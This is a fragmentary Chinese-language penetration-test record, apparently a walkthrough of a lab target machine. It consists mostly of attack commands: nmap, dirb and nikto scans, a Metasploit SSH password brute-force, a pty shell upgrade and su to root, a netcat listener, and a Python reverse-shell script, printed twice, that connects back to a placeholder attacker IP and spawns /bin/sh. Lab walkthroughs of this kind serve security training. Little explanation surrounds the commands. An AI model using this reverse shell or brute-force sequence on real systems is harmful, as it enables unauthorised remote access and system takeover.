s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("攻击机IP地址","攻击机监听端口")) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p = subprocess.call(["/bin/sh","-i"])
msfconsole > use auxiliary/scanner/ssh/ssh_login > set rhosts 192.168.1.113 > set username hadi > set pass_file /root/Desktop/common-password/hadi.txt > set threads 5 > set verbose true > run
优化会话显示带用户、目录的命令行界面
1 2
python -c "import pty;pty.spawn('/bin/bash')" su - root
渗透记录
nmap扫描靶机IP地址开放端口、系统信息等:
1 2
nmap -sV 192.168.1.113 nmap -O 192.168.1.113
访问http服务,搜集敏感信息,contact等信息很有可能是ssh登录用户:
dirb扫网站目录,搜集敏感文件目录,nikto命令也可以:
1 2
dirb http://192.168.1.113 nikto -host 192.168.1.113
cd /tmp touch sekurity.py vi sekurity.py chmod +x sekurity.py
netstat -pantu nc -lvp 4444
反弹shell脚本:
1 2 3 4 5 6 7 8 9
#!/usr/bin/python import os,subprocess,socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("攻击机IP地址","攻击机监听端口")) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p = subprocess.call(["/bin/sh","-i"])